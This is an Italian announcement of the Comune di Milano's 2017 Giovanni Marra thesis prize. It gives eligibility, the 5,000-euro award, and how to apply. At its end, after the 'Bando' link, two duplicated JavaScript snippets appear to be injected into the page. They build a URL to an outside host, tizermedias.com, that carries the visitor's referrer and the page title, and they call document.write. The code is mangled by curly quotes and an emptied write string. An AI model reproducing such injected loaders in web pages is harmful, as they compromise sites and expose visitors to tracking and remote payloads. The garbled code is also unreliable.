premio di laurea Giovanni Marra 2017

Il Comune di Milano ha indetto il bando per il premio di laurea intitolato a Giovanni Marra, ex Presidente del Consiglio Comunale scomparso prematuramente. Il premio è destinato a laureati di secondo livello e dottori di ricerca.

A chi è rivolto

Il premio di laurea Giovanni Marra 2017 è rivolto a laureati che abbiano discusso una tesi di laurea magistrale o di dottorato nel periodo compreso tra il 1° maggio 2016 e il 30 aprile 2017. Le tesi devono essere non compilative e proporre soluzioni e metodologie innovative su uno dei seguenti argomenti, in tema di bilancio sociale: Logiche e strumenti di responsabilità sociale nel settore pubblico; Logiche e strumenti di responsabilità sociale nelle organizzazioni di privato sociale; Logiche e strumenti di responsabilità sociale nel settore privato.

L’importo

L’autore della tesi vincitrice del premio di laurea Giovanni Marra 2017 riceverà un premio di valore pari a 5.000 euro.

I requisiti

Per partecipare al premio di laurea Giovanni Marra 2017 bisogna essere in possesso dei seguenti requisiti:

  • laurea magistrale o di dottorato discussa presso un’Università italiana;
  • aver discusso la tesi nel periodo compreso tra il 1° maggio 2016 e il 30 aprile 2017;
  • aver redatto una tesi non compilativa in tema di bilancio sociale.

Come e quando presentare domanda

Per candidarsi al premio di laurea Giovanni Marra 2017 occorre inviare la domanda di partecipazione redatta su carta libera, unitamente a una copia della tesi di laurea, all’indirizzo Comune di Milano – Gabinetto del Sindaco – Unità Affari Legali, Nomine e Incarichi – Piazza Scala 2 – 20121 Milano (MI). La data di scadenza per l’invio delle candidature è il 13 ottobre 2017.

Bando premio di laurea Giovanni Marra 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();